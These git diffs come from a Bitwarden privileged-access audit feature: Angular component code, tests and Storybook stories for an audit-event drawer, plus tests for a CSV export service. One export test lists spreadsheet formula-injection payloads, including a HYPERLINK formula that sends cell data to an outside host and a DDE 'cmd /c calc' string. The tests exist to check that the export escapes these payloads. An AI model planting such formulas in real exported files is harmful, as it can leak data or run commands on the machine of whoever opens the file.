@@ -28,13 +40,14 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     cipherName: "Prod database",
     cipherId: "cipher-1",
     collectionName: "Production",
-    ruleName: null,
+    collectionId: "collection-1",
+    ruleName: "Approval required",
     ruleId: "rule-1",
     detail: "Approved for the incident window.",
     automated: false,
     inDoubt: false,
-    requestId: "req-1",
-    leaseId: "lease-1",
+    requestId: REQUEST_ID,
+    leaseId: LEASE_ID,
     duration: { key: "pamInboxDuration1Hour", value: null },
     exactWindow: "18/08/2026, 09:00 – 18/08/2026, 10:00",
     extendedUntil: null,
@@ -45,6 +58,8 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
 describe("AuditEventDrawerComponent", () => {
   let fixture: ComponentFixture<AuditEventDrawerComponent>;
   let dialogService: MockProxy<DialogService>;
+  let dialogRef: MockProxy<DialogRef>;
+  let platformUtilsService: MockProxy<PlatformUtilsService>;
 
   const render = async (overrides: Partial<AuditEventDrawerParams> = {}) => {
     const params: AuditEventDrawerParams = {
@@ -52,14 +67,20 @@ describe("AuditEventDrawerComponent", () => {
       organizationId: ORGANIZATION_ID,
       actor: ADA,
       requester: GRACE,
+      canManageAccessRules: true,
+      canViewCollections: true,
       ...overrides,
     };
 
     await TestBed.configureTestingModule({
       imports: [AuditEventDrawerComponent],
       providers: [
+        provideRouter([]),
         { provide: DIALOG_DATA, useValue: params },
         { provide: DialogService, useValue: dialogService },
+        { provide: DialogRef, useValue: dialogRef },
+        { provide: PlatformUtilsService, useValue: platformUtilsService },
+        { provide: ToastService, useValue: mock<ToastService>() },
         {
           provide: I18nService,
           // I18nMockService throws on an unknown key, so this is every key the pane can render.
@@ -82,6 +103,9 @@ describe("AuditEventDrawerComponent", () => {
             pamInboxDuration1Hour: "1 hour",
             pamAuditKindLeaseActivated: "Lease activated",
             pamAuditKindLeaseExtended: "Lease extended",
+            pamAuditKindRuleDeleted: "Access rule deleted",
+            copyValue: "Copy value",
+            copySuccessful: "Copy Successful",
             close: "Close",
           }),
         },
@@ -101,6 +125,8 @@ describe("AuditEventDrawerComponent", () => {
 
   beforeEach(() => {
     dialogService = mock<DialogService>();
+    dialogRef = mock<DialogRef>();
+    platformUtilsService = mock<PlatformUtilsService>();
   });
 
   afterEach(() => {
@@ -157,9 +183,9 @@ describe("AuditEventDrawerComponent", () => {
       expect(text("duration")).toBe("1 hour");
       expect(text("window")).toBe("18/08/2026, 09:00 – 18/08/2026, 10:00");
       expect(text("detail")).toBe("Approved for the incident window.");
-      expect(text("request-id")).toBe("req-1");
-      expect(text("lease-id")).toBe("lease-1");
-      expect(text("rule-id")).toBe("rule-1");
+      expect(text("request-id")).toBe("3a9d5f74");
+      expect(text("lease-id")).toBe("b27e4c91");
+      expect(text("rule")).toBe("Approval required");
     });
 
     it("puts each identity's email under their name", async () => {
@@ -223,6 +249,7 @@ describe("AuditEventDrawerComponent", () => {
       cipherName: null,
       cipherId: null,
       collectionName: null,
+      collectionId: null,
       ruleName: null,
       ruleId: null,
       detail: null,
@@ -243,7 +270,7 @@ describe("AuditEventDrawerComponent", () => {
       "detail",
       "request-id",
       "lease-id",
-      "rule-id",
+      "rule",
     ])("renders the muted em dash for an absent %s", async (name) => {
       await render({ row: EMPTY_ROW, actor: null, requester: null });
 
@@ -315,5 +342,105 @@ describe("AuditEventDrawerComponent", () => {
 
       expect(fixture.nativeElement.querySelector("#pam-audit-event-drawer_link_item")).toBeNull();
     });
+  });
+
+  describe("access rule", () => {
+    const link = () => fixture.nativeElement.querySelector("#pam-audit-event-drawer_link_rule");
+
+    // A uuid tells an auditor nothing, and the store already carries the name it stood for.
+    it("names the rule rather than identifying it by uuid", async () => {
+      await render();
+
+      expect(text("rule")).toBe("Approval required");
+      expect(text("rule")).not.toContain("rule-1");
+    });
+
+    it("links the name to the rule editor when the viewer administers rules", async () => {
+      await render();
+
+      expect(link().getAttribute("href")).toBe("/organizations/org-1/pam/access-rules/rule-1");
+    });
+
+    // The rule is gone, so the editor would answer the one event most worth reading with a 404.
+    it("leaves a rule deletion's name as plain text", async () => {
+      await render({ row: row({ kindLabelKey: "pamAuditKindRuleDeleted" }) });
+
+      expect(link()).toBeNull();
+      expect(text("rule")).toBe("Approval required");
+    });
+
+    // This page's own guard does not imply the rule editor's.
+    it("leaves the name as plain text without the rules permission", async () => {
+      await render({ canManageAccessRules: false });
+
+      expect(link()).toBeNull();
+      expect(text("rule")).toBe("Approval required");
+    });
+
+    it("closes the drawer before following the link out of it", async () => {
+      await render();
+      jest.spyOn(TestBed.inject(Router), "navigateByUrl").mockResolvedValue(true);
+
+      link().click();
+
+      expect(dialogRef.close).toHaveBeenCalled();
+    });
+  });
+
+  describe("collection", () => {
+    const link = () =>
+      fixture.nativeElement.querySelector("#pam-audit-event-drawer_link_collection");
+
+    it("links the name to the organization vault narrowed to that collection", async () => {
+      await render();
+
+      expect(link().getAttribute("href")).toBe(
+        "/organizations/org-1/vault?collectionId=collection-1",
+      );
+    });
+
+    it("leaves the name as plain text without permission to open the vault", async () => {
+      await render({ canViewCollections: false });
+
+      expect(link()).toBeNull();
+      expect(text("collection")).toBe("Production");
+    });
+  });
+
+  describe("request and lease ids", () => {
+    const copyButton = (name: string): HTMLElement =>
+      fixture.nativeElement.querySelector(`#pam-audit-event-drawer_button_copy-${name}`);
+
+    it.each([
+      ["request-id", REQUEST_ID],
+      ["lease-id", LEASE_ID],
+    ])("shortens the %s to its first eight characters", async (name, id) => {
+      await render();
+
+      expect(text(name)).toBe(id.substring(0, 8));
+      expect(text(name)).toHaveLength(8);
+    });
+
+    it.each([
+      ["request-id", REQUEST_ID],
+      ["lease-id", LEASE_ID],
+    ])("copies the whole %s, not the short form", async (name, id) => {
+      await render();
+
+      copyButton(name).click();
+
+      expect(platformUtilsService.copyToClipboard).toHaveBeenCalledWith(id);
+    });
+
+    // Nothing to copy, so nothing to offer copying.
+    it.each(["request-id", "lease-id"])(
+      "offers no copy affordance beside an absent %s",
+      async (name) => {
+        await render({ row: row({ requestId: null, leaseId: null }) });
+
+        expect(text(name)).toBe("—");
+        expect(copyButton(name)).toBeNull();
+      },
+    );
   });
 });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.stories.ts
@@ -1,7 +1,10 @@
 import { importProvidersFrom } from "@angular/core";
+import { provideNoopAnimations } from "@angular/platform-browser/animations";
+import { provideRouter } from "@angular/router";
 import { Meta, StoryObj, applicationConfig, moduleMetadata } from "@storybook/angular";
 
-import { DIALOG_DATA, DialogService } from "@bitwarden/components";
+import { PlatformUtilsService } from "@bitwarden/common/platform/abstractions/platform-utils.service";
+import { DIALOG_DATA, DialogService, ToastModule } from "@bitwarden/components";
 import { PreloadedEnglishI18nModule } from "@bitwarden/web-vault/app/core/tests";
 
 import { AuditRow } from "../access-audit-row";
@@ -23,7 +26,8 @@ const POPULATED: AuditRow = {
   cipherName: "Production database credential",
   cipherId: "cipher-1",
   collectionName: "Production infrastructure",
-  ruleName: null,
+  collectionId: "5c4b3a29-1d8e-4f60-b2a7-3e9c8d1f0a64",
+  ruleName: "Approval required",
   ruleId: "8f1c0f2e-9b4a-4d1e-8a77-6c2f9d3b4a51",
   detail:
     "Approved ahead of the scheduled window after the on-call engineer confirmed the primary replica had not recovered, on the understanding that the credential would be surrendered as soon as failover completed.",
@@ -53,6 +57,7 @@ const BARE: AuditRow = {
   cipherName: null,
   cipherId: null,
   collectionName: null,
+  collectionId: null,
   ruleName: null,
   ruleId: null,
   detail: null,
@@ -65,7 +70,25 @@ const BARE: AuditRow = {
   extendedUntil: null,
 };
 
-function params(row: AuditRow, linked: boolean): AuditEventDrawerParams {
+/**
+ * A rule deletion, whose name the store snapshotted at write time. The rule itself is gone, so the
+ * name must render without an anchor however the viewer is permissioned.
+ */
+const RULE_DELETED: AuditRow = {
+  ...POPULATED,
+  kindLabelKey: "pamAuditKindRuleDeleted",
+  cipherName: null,
+  cipherId: null,
+  collectionName: null,
+  collectionId: null,
+  requestId: null,
+  leaseId: null,
+  duration: null,
+  exactWindow: null,
+  detail: null,
+};
+
+function params(row: AuditRow, linked: boolean, permitted = linked): AuditEventDrawerParams {
   return {
     row,
     organizationId: "org-1",
@@ -75,6 +98,8 @@ function params(row: AuditRow, linked: boolean): AuditEventDrawerParams {
     requester: linked
       ? { name: "Grace Hopper", email: "grace@example.com", organizationUserId: "org-user-1" }
       : null,
+    canManageAccessRules: permitted,
+    canViewCollections: permitted,
   };
 }
 
@@ -87,7 +112,18 @@ export default {
       providers: [{ provide: DialogService, useValue: { open: (): undefined => undefined } }],
     }),
     applicationConfig({
-      providers: [importProvidersFrom(PreloadedEnglishI18nModule)],
+      providers: [
+        importProvidersFrom(PreloadedEnglishI18nModule),
+        provideRouter([]),
+        provideNoopAnimations(),
+        ToastModule.forRoot().providers!,
+        {
+          provide: PlatformUtilsService,
+          useValue: {
+            copyToClipboard: (): void => undefined,
+          },
+        },
+      ],
     }),
   ],
 } as Meta<AuditEventDrawerComponent>;
@@ -115,6 +151,34 @@ export const EmptyFields: Story = {
   render: () => ({
     moduleMetadata: {
       providers: [{ provide: DIALOG_DATA, useValue: params(BARE, false) }],
+    },
+    template: `<pam-audit-event-drawer />`,
+  }),
+};
+
+/**
+ * The rule this event names no longer exists, so the Access rule field reads as a name with no anchor
+ * even though the viewer administers rules. Following one would land on a 404 from the very event an
+ * auditor reconstructing a change is most likely to open.
+ */
+export const DeletedRule: Story = {
+  render: () => ({
+    moduleMetadata: {
+      providers: [{ provide: DIALOG_DATA, useValue: params(RULE_DELETED, true) }],
+    },
+    template: `<pam-audit-event-drawer />`,
+  }),
+};
+
+/**
+ * The same event read by an auditor holding AccessEventLogs and nothing more. Every name is still
+ * there — the pane withholds no fact — but the rule and the collection are plain text, because the
+ * pages behind them are guarded by permissions this viewer does not hold.
+ */
+export const WithoutLinkPermissions: Story = {
+  render: () => ({
+    moduleMetadata: {
+      providers: [{ provide: DIALOG_DATA, useValue: params(POPULATED, true, false) }],
     },
     template: `<pam-audit-event-drawer />`,
   }),

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.stories.ts
@@ -1,0 +1,121 @@
+import { importProvidersFrom } from "@angular/core";
+import { Meta, StoryObj, applicationConfig, moduleMetadata } from "@storybook/angular";
+
+import { DIALOG_DATA, DialogService } from "@bitwarden/components";
+import { PreloadedEnglishI18nModule } from "@bitwarden/web-vault/app/core/tests";
+
+import { AuditRow } from "../access-audit-row";
+
+import { AuditEventDrawerComponent, AuditEventDrawerParams } from "./audit-event-drawer.component";
+
+const OCCURRED_AT = new Date("2026-08-18T09:00:00.000Z");
+
+/** A lease activation with every field the trail can carry — the widest the pane ever gets. */
+const POPULATED: AuditRow = {
+  occurredAt: OCCURRED_AT,
+  kindLabelKey: "pamAuditKindLeaseActivated",
+  actor: "Ada Lovelace",
+  actorId: "user-2",
+  actorEmail: "ada@example.com",
+  requester: "Grace Hopper",
+  requesterId: "user-1",
+  requesterEmail: "grace@example.com",
+  cipherName: "Production database credential",
+  cipherId: "cipher-1",
+  collectionName: "Production infrastructure",
+  ruleName: null,
+  ruleId: "8f1c0f2e-9b4a-4d1e-8a77-6c2f9d3b4a51",
+  detail:
+    "Approved ahead of the scheduled window after the on-call engineer confirmed the primary replica had not recovered, on the understanding that the credential would be surrendered as soon as failover completed.",
+  automated: false,
+  inDoubt: false,
+  requestId: "3a9d5f74-2c18-4c6b-9f0d-71b8e4a2c6d5",
+  leaseId: "b27e4c91-5d3a-4f88-a1c6-90e7d5f2b834",
+  duration: { key: "pamInboxDurationHours", value: 4 },
+  exactWindow: "18/08/2026, 09:00 – 18/08/2026, 13:00",
+  extendedUntil: null,
+};
+
+/**
+ * The absence check: a freeze the system recorded against nothing, whose outcome was never confirmed.
+ * Every field the pane can render carries no value, so the muted em dash lines up down the whole pane
+ * — beside the one absence that is not one, the automated event's actor, which reads "System".
+ */
+const BARE: AuditRow = {
+  occurredAt: OCCURRED_AT,
+  kindLabelKey: "pamAuditKindLeasingFreezeEnabled",
+  actor: null,
+  actorId: null,
+  actorEmail: null,
+  requester: null,
+  requesterId: null,
+  requesterEmail: null,
+  cipherName: null,
+  cipherId: null,
+  collectionName: null,
+  ruleName: null,
+  ruleId: null,
+  detail: null,
+  automated: true,
+  inDoubt: true,
+  requestId: null,
+  leaseId: null,
+  duration: null,
+  exactWindow: null,
+  extendedUntil: null,
+};
+
+function params(row: AuditRow, linked: boolean): AuditEventDrawerParams {
+  return {
+    row,
+    organizationId: "org-1",
+    actor: linked
+      ? { name: "Ada Lovelace", email: "ada@example.com", organizationUserId: "org-user-2" }
+      : null,
+    requester: linked
+      ? { name: "Grace Hopper", email: "grace@example.com", organizationUserId: "org-user-1" }
+      : null,
+  };
+}
+
+export default {
+  title: "Web/PAM/Access Audit/Event Drawer",
+  component: AuditEventDrawerComponent,
+  decorators: [
+    moduleMetadata({
+      imports: [AuditEventDrawerComponent],
+      providers: [{ provide: DialogService, useValue: { open: (): undefined => undefined } }],
+    }),
+    applicationConfig({
+      providers: [importProvidersFrom(PreloadedEnglishI18nModule)],
+    }),
+  ],
+} as Meta<AuditEventDrawerComponent>;
+
+type Story = StoryObj<AuditEventDrawerComponent>;
+
+/**
+ * Everything an auditor needs about one event, in the order they read it: when, who, what, the window
+ * granted, the free text the table's Detail column gave up, and the ids support asks for.
+ */
+export const Default: Story = {
+  render: () => ({
+    moduleMetadata: {
+      providers: [{ provide: DIALOG_DATA, useValue: params(POPULATED, true) }],
+    },
+    template: `<pam-audit-event-drawer />`,
+  }),
+};
+
+/**
+ * An event that names almost nothing. Every field still renders, absence showing as the muted em dash
+ * the table uses, so a reader can tell "we hold no value for this" from a pane that failed to draw it.
+ */
+export const EmptyFields: Story = {
+  render: () => ({
+    moduleMetadata: {
+      providers: [{ provide: DIALOG_DATA, useValue: params(BARE, false) }],
+    },
+    template: `<pam-audit-event-drawer />`,
+  }),
+};

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.ts
@@ -1,0 +1,108 @@
+import { CommonModule } from "@angular/common";
+import { ChangeDetectionStrategy, Component, inject } from "@angular/core";
+
+import {
+  BadgeModule,
+  DIALOG_DATA,
+  DialogConfig,
+  DialogModule,
+  DialogService,
+  LinkModule,
+  TooltipDirective,
+} from "@bitwarden/components";
+import { I18nPipe } from "@bitwarden/ui-common";
+import { openEntityEventsDialog } from "@bitwarden/web-vault/app/dirt/event-logs/components/entity-events/entity-events.component";
+import { ResolvedMember } from "@bitwarden/web-vault/app/dirt/event-logs/components/send-access-member";
+
+import { AuditRow } from "../access-audit-row";
+
+/**
+ * One audit event, plus what the table already worked out about it.
+ *
+ * The two identities arrive already resolved rather than as ids to look up: whether a name is an
+ * anchor depends on the member lookup the page ran once for the whole trail, which this drawer has
+ * no business repeating — and must not disagree with, or a name that is plain text in the row would
+ * become a link in the pane over it.
+ */
+export type AuditEventDrawerParams = {
+  row: AuditRow;
+  organizationId: string;
+  /** The actor as someone whose event history can be opened, or null when the row shows no anchor. */
+  actor: ResolvedMember | null;
+  /** The requester, on the same terms as {@link AuditEventDrawerParams.actor}. */
+  requester: ResolvedMember | null;
+};
+
+/**
+ * One audit event read whole, in the side drawer.
+ *
+ * The table cannot hold every field an auditor needs — Detail alone is unbounded free text, and the
+ * column it used to occupy cost the other six more width than it earned. Everything the row carries
+ * is here instead, including the request, lease and rule ids, which the table never showed at all
+ * and which are what support asks for when an event has to be chased beyond this page.
+ *
+ * Read-only, and deliberately without a drill-down to another PAM page, for the reason the table has
+ * none: the request-detail page is authorized for the requester or a managing approver, a different
+ * permission from the AccessEventLogs one that opens this trail. What the names and the item do open
+ * is the shared entity-events dialog, exactly as the equivalent cells do, over that same permission.
+ *
+ * Every field renders, whether or not the event carries a value for it, absence showing as the muted
+ * em dash the table uses. A pane that dropped its empty rows would read as a different event each
+ * time, and an auditor could not tell "we hold no value for this" from "this pane forgot to draw it".
+ */
+@Component({
+  selector: "pam-audit-event-drawer",
+  templateUrl: "./audit-event-drawer.component.html",
+  changeDetection: ChangeDetectionStrategy.OnPush,
+  imports: [CommonModule, BadgeModule, DialogModule, LinkModule, TooltipDirective, I18nPipe],
+})
+export class AuditEventDrawerComponent {
+  private readonly dialogService = inject(DialogService);
+  protected readonly params = inject<AuditEventDrawerParams>(DIALOG_DATA);
+
+  protected get row(): AuditRow {
+    return this.params.row;
+  }
+
+  /** Opens an identity's own event history, the way the table's equivalent cell opens it. */
+  protected openMemberEvents(event: Event, member: ResolvedMember): void {
+    event.preventDefault();
+    if (member.organizationUserId == null) {
+      return;
+    }
+    openEntityEventsDialog(this.dialogService, {
+      data: {
+        entity: "user",
+        entityId: member.organizationUserId,
+        organizationId: this.params.organizationId,
+        name: member.name,
+        showUser: true,
+      },
+    });
+  }
+
+  /** Opens the subject item's own event history. Reachable only from an item this viewer's vault decrypted. */
+  protected openCipherEvents(event: Event): void {
+    event.preventDefault();
+    const { cipherId, cipherName } = this.row;
+    if (cipherId == null || cipherName == null) {
+      return;
+    }
+    openEntityEventsDialog(this.dialogService, {
+      data: {
+        entity: "cipher",
+        entityId: cipherId,
+        organizationId: this.params.organizationId,
+        name: cipherName,
+        showUser: true,
+      },
+    });
+  }
+
+  static open(dialogService: DialogService, config: DialogConfig<AuditEventDrawerParams>) {
+    return dialogService.openDrawer<unknown, AuditEventDrawerParams, AuditEventDrawerComponent>(
+      AuditEventDrawerComponent,
+      config,
+    );
+  }
+}

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-event-drawer/audit-event-drawer.component.ts
@@ -1,12 +1,16 @@
 import { CommonModule } from "@angular/common";
 import { ChangeDetectionStrategy, Component, inject } from "@angular/core";
+import { RouterLink } from "@angular/router";
 
 import {
   BadgeModule,
+  CopyClickDirective,
   DIALOG_DATA,
   DialogConfig,
   DialogModule,
+  DialogRef,
   DialogService,
+  IconButtonModule,
   LinkModule,
   TooltipDirective,
 } from "@bitwarden/components";
@@ -14,7 +18,7 @@ import { I18nPipe } from "@bitwarden/ui-common";
 import { openEntityEventsDialog } from "@bitwarden/web-vault/app/dirt/event-logs/components/entity-events/entity-events.component";
 import { ResolvedMember } from "@bitwarden/web-vault/app/dirt/event-logs/components/send-access-member";
 
-import { AuditRow } from "../access-audit-row";
+import { AuditRow, auditRuleDeleted } from "../access-audit-row";
 
 /**
  * One audit event, plus what the table already worked out about it.
@@ -31,6 +35,16 @@ export type AuditEventDrawerParams = {
   actor: ResolvedMember | null;
   /** The requester, on the same terms as {@link AuditEventDrawerParams.actor}. */
   requester: ResolvedMember | null;
+  /**
+   * Whether the viewer may open the rule editor this pane's access-rule name links to. This page's own
+   * `canAccessEventLogs` does not imply it, so for many auditors the name stays plain text.
+   */
+  canManageAccessRules: boolean;
+  /**
+   * Whether the viewer may open the organization vault the collection name links to, which is guarded
+   * by `canViewAllCollections` — again not implied by the permission that opened this trail.
+   */
+  canViewCollections: boolean;
 };
 
 /**
@@ -38,13 +52,20 @@ export type AuditEventDrawerParams = {
  *
  * The table cannot hold every field an auditor needs — Detail alone is unbounded free text, and the
  * column it used to occupy cost the other six more width than it earned. Everything the row carries
- * is here instead, including the request, lease and rule ids, which the table never showed at all
- * and which are what support asks for when an event has to be chased beyond this page.
+ * is here instead, including the request and lease ids, which the table never showed at all and which
+ * are what support asks for when an event has to be chased beyond this page.
  *
- * Read-only, and deliberately without a drill-down to another PAM page, for the reason the table has
- * none: the request-detail page is authorized for the requester or a managing approver, a different
- * permission from the AccessEventLogs one that opens this trail. What the names and the item do open
- * is the shared entity-events dialog, exactly as the equivalent cells do, over that same permission.
+ * Read-only, and every anchor is gated on the viewer holding the permission its target is guarded by.
+ * This page is authorized by AccessEventLogs alone, which implies very little else, so an ungated link
+ * would send an auditor into a bounce from the pane that is meant to explain the event. The actor, the
+ * requester and the item open the shared entity-events dialog over that same AccessEventLogs
+ * permission; the access rule opens the rule editor only under `canManageAccessRules`, and the
+ * collection opens the organization vault narrowed to it only under `canViewAllCollections`.
+ *
+ * The request and lease ids anchor nothing at all: the request-detail page is authorized for the
+ * request's requester or a managing approver, which is a different permission again, and no page keys
+ * on a lease id. They are rendered short and made copyable instead, so an auditor can hand support the
+ * whole id without reading thirty-six characters off the screen.
  *
  * Every field renders, whether or not the event carries a value for it, absence showing as the muted
  * em dash the table uses. A pane that dropped its empty rows would read as a different event each
@@ -54,14 +75,76 @@ export type AuditEventDrawerParams = {
   selector: "pam-audit-event-drawer",
   templateUrl: "./audit-event-drawer.component.html",
   changeDetection: ChangeDetectionStrategy.OnPush,
-  imports: [CommonModule, BadgeModule, DialogModule, LinkModule, TooltipDirective, I18nPipe],
+  imports: [
+    CommonModule,
+    RouterLink,
+    BadgeModule,
+    CopyClickDirective,
+    DialogModule,
+    IconButtonModule,
+    LinkModule,
+    TooltipDirective,
+    I18nPipe,
+  ],
 })
 export class AuditEventDrawerComponent {
   private readonly dialogService = inject(DialogService);
+  /**
+   * Optional: the pane normally sits in a drawer it must close before navigating away, but it also
+   * renders standalone (a story), where there is no drawer to close.
+   */
+  private readonly dialogRef = inject(DialogRef, { optional: true });
   protected readonly params = inject<AuditEventDrawerParams>(DIALOG_DATA);
 
   protected get row(): AuditRow {
     return this.params.row;
+  }
+
+  /**
+   * The rule editor's route for this event's access rule, or null when the pane must not link it.
+   *
+   * Null on a deletion even though the name is still there to render: the store snapshotted it at write
+   * time and the rule itself is gone, so the route would 404 on the one rule event an auditor most needs
+   * to read. Null too without `canManageAccessRules`, which is the guard on that route and is not what
+   * authorized this page.
+   */
+  protected get ruleRoute(): string[] | null {
+    const { ruleName, ruleId } = this.row;
+    if (
+      ruleName == null ||
+      ruleId == null ||
+      !this.params.canManageAccessRules ||
+      auditRuleDeleted(this.row)
+    ) {
+      return null;
+    }
+    return ["/organizations", this.params.organizationId, "pam", "access-rules", ruleId];
+  }
+
+  /**
+   * The organization vault's route for this event's collection, or null when the pane must not link it.
+   *
+   * The collection id rides in a query parameter rather than the path — the same anchor the admin
+   * console's own collection rows use — so the landing is that one collection's contents, never an
+   * unfiltered list. A name that did not resolve means the collection is not in this viewer's local
+   * vault state, which is reason enough not to send them to it.
+   */
+  protected get collectionRoute(): string[] | null {
+    const { collectionName, collectionId } = this.row;
+    if (collectionName == null || collectionId == null || !this.params.canViewCollections) {
+      return null;
+    }
+    return ["/organizations", this.params.organizationId, "vault"];
+  }
+
+  /** An id in the short form the organization event log uses, which is enough to match two records by eye. */
+  protected shortId(id: string): string {
+    return id.substring(0, 8);
+  }
+
+  /** Closes the drawer when following a link out of it, so no pane is stranded over the page beneath. */
+  protected closeDrawer(): void {
+    void this.dialogRef?.close();
   }
 
   /** Opens an identity's own event history, the way the table's equivalent cell opens it. */

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
@@ -74,6 +74,7 @@ describe("AuditExportService", () => {
         automated: false,
         incomplete: false,
         requestId: "req-1",
+        leaseId: "lease-1",
       });
     });
 
@@ -102,6 +103,7 @@ describe("AuditExportService", () => {
           ruleName: null,
           detail: null,
           requestId: null,
+          leaseId: null,
           duration: null,
           exactWindow: null,
           extendedUntil: null,
@@ -126,6 +128,7 @@ describe("AuditExportService", () => {
         automated: true,
         incomplete: true,
         requestId: "",
+        leaseId: "",
       });
       expect(JSON.stringify(exported)).not.toMatch(/null|undefined/);
     });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
@@ -27,7 +27,6 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     duration: { key: "pamInboxDurationHours", value: 4 },
     exactWindow: "6/30/26, 12:00 – 6/30/26, 16:00",
     extendedUntil: null,
-    searchText: "ada lovelace grace hopper prod db production",
     ...overrides,
   };
 }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
@@ -18,6 +18,7 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     requesterId: "user-grace",
     requesterEmail: "grace@example.com",
     cipherName: "prod db",
+    cipherId: "cipher-1",
     collectionName: "production",
     ruleName: "Production access",
     detail: "Approved for the incident window.",

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
@@ -166,6 +166,56 @@ describe("AuditExportService", () => {
       expect(parsed.data[0].event).toBe("Lease activated");
     });
 
+    // A denial reason is free text written by someone other than the auditor who opens the file. Left
+    // as it was typed, a leading trigger makes the cell a formula the spreadsheet runs on open — the
+    // usual shape being a HYPERLINK that carries a neighbouring cell off to another host.
+    it.each([
+      ["=", '=HYPERLINK("http://example.test/"&A1,"click")'],
+      ["+", "+1+1"],
+      ["-", "-1+1"],
+      ["@", '@SUM(1,1)*cmd|" /c calc"!A0'],
+      ["a leading tab", "\t=1+1"],
+      ["a leading carriage return", "\r=1+1"],
+    ])("neutralizes a detail opening with %s", (_trigger, detail) => {
+      const parsed = papa.parse<Record<string, string>>(service.getAuditExport([row({ detail })]), {
+        header: true,
+      });
+
+      expect(parsed.data[0].detail).toBe(`'${detail}`);
+    });
+
+    // The escape is an escape, not a redaction: the auditor has to read the comment that was left.
+    it("keeps the original text behind the escape", () => {
+      const detail = "=1+1";
+
+      const exported = service.toAuditExport(row({ detail }));
+
+      expect(exported.detail.slice(1)).toBe(detail);
+    });
+
+    // Every cell an auditor did not choose is a candidate, not just the free-text one.
+    it("neutralizes a name a member set on themselves", () => {
+      const parsed = papa.parse<Record<string, string>>(
+        service.getAuditExport([row({ actor: "=1+1", cipherName: "@SUM(1,1)" })]),
+        { header: true },
+      );
+
+      expect(parsed.data[0].actorName).toBe("'=1+1");
+      expect(parsed.data[0].itemName).toBe("'@SUM(1,1)");
+    });
+
+    // An ordinary value must reach the file unchanged, or every cell an auditor reads carries a mark
+    // that was never in the record.
+    it("writes an ordinary value through untouched", () => {
+      const parsed = papa.parse<Record<string, string>>(service.getAuditExport([row()]), {
+        header: true,
+      });
+
+      expect(parsed.data[0].detail).toBe("Approved for the incident window.");
+      expect(parsed.data[0].actorName).toBe("Ada Lovelace");
+      expect(parsed.data[0].timestamp).toBe("2026-06-30T12:00:00.000Z");
+    });
+
     it("names the file with a PAM-specific prefix and a csv extension", () => {
       expect(service.getFileName()).toMatch(/^bitwarden_pam_audit_export_\d{14}\.csv$/);
     });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
@@ -1,0 +1,173 @@
+import { TestBed } from "@angular/core/testing";
+import * as papa from "papaparse";
+
+import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.service";
+import { I18nMockService } from "@bitwarden/components";
+
+import { AuditRow } from "./access-audit-row";
+import { AuditExportService } from "./audit-export.service";
+
+function row(overrides: Partial<AuditRow> = {}): AuditRow {
+  return {
+    occurredAt: new Date("2026-06-30T12:00:00Z"),
+    kindLabelKey: "pamAuditKindLeaseActivated",
+    actor: "Ada Lovelace",
+    actorId: "user-ada",
+    actorEmail: "ada@example.com",
+    requester: "Grace Hopper",
+    requesterId: "user-grace",
+    requesterEmail: "grace@example.com",
+    cipherName: "prod db",
+    collectionName: "production",
+    ruleName: "Production access",
+    detail: "Approved for the incident window.",
+    automated: false,
+    inDoubt: false,
+    requestId: "req-1",
+    duration: { key: "pamInboxDurationHours", value: 4 },
+    exactWindow: "6/30/26, 12:00 – 6/30/26, 16:00",
+    extendedUntil: null,
+    searchText: "ada lovelace grace hopper prod db production",
+    ...overrides,
+  };
+}
+
+describe("AuditExportService", () => {
+  let service: AuditExportService;
+
+  beforeEach(() => {
+    TestBed.configureTestingModule({
+      providers: [
+        {
+          provide: I18nService,
+          useValue: new I18nMockService({
+            pamAuditKindLeaseActivated: "Lease activated",
+            pamAuditKindRuleCreated: "Access rule created",
+            pamInboxDurationHours: "__$1__ hours",
+            pamInboxDuration1Hour: "1 hour",
+          }),
+        },
+      ],
+    });
+    service = TestBed.inject(AuditExportService);
+  });
+
+  describe("toAuditExport", () => {
+    it("maps a fully populated row onto the column contract", () => {
+      expect(service.toAuditExport(row())).toEqual({
+        timestamp: "2026-06-30T12:00:00.000Z",
+        event: "Lease activated",
+        actorName: "Ada Lovelace",
+        actorEmail: "ada@example.com",
+        requesterName: "Grace Hopper",
+        requesterEmail: "grace@example.com",
+        itemName: "prod db",
+        collectionName: "production",
+        ruleName: "Production access",
+        grantedDuration: "4 hours",
+        detail: "Approved for the incident window.",
+        automated: false,
+        incomplete: false,
+      });
+    });
+
+    // The file outlives the session that produced it, so the instant is written in full rather than in the
+    // exporter's own zone the way the Time column renders it.
+    it("writes the timestamp as a full ISO 8601 instant", () => {
+      const exported = service.toAuditExport(
+        row({ occurredAt: new Date("2026-01-05T23:30:15.250Z") }),
+      );
+
+      expect(exported.timestamp).toBe("2026-01-05T23:30:15.250Z");
+    });
+
+    it("renders every absent value as an empty cell", () => {
